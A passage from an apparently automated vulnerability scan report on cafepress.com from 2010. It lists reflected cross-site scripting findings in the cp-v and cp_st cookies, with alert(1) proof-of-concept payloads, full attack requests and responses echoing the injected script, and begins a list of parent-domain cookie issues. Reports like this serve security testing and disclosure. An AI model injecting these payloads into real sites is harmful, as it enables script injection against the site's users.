__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 54274
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-ornaments

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d007</script><script>alert(1)</script>1409bed2e4a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4d007</script><script>alert(1)</script>1409bed2e4a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 54293
Date: Sun, 26 Dec 2010 13:48:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '4d007</script><script>alert(1)</script>1409bed2e4a'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/photo-on-canvas

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 390f6"-alert(1)-"cf485b1a7be was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/photo-on-canvas HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 64044
Date: Sun, 26 Dec 2010 13:47:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 64044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/photo-on-canvas

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa097</script><script>alert(1)</script>ac2f65e7c84 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/photo-on-canvas HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=aa097</script><script>alert(1)</script>ac2f65e7c84; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 63812
Date: Sun, 26 Dec 2010 13:47:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'aa097</script><script>alert(1)</script>ac2f65e7c84'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/sk/TheGamingApe

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ba9"-alert(1)-"3e702ef6992 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sk/TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 174586
Date: Sun, 26 Dec 2010 13:49:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 174586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/sk/TheGamingApe

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 622eb</script><script>alert(1)</script>7a1f01045b0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sk/TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=622eb</script><script>alert(1)</script>7a1f01045b0; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 174630
Date: Sun, 26 Dec 2010 13:49:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 174630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SKGallery'
window.cafepress.tealeaf.searchTerm = '622eb</script><script>alert(1)</script>7a1f01045b0'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_0
...[SNIP]...

2. Cookie scoped to parent domain previous next
There are 70 instances of this issue:

/
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
/+aprons
/+baby-blanket
/+baby-bodysuits
/+baby-hat
/+bags
/+boxers
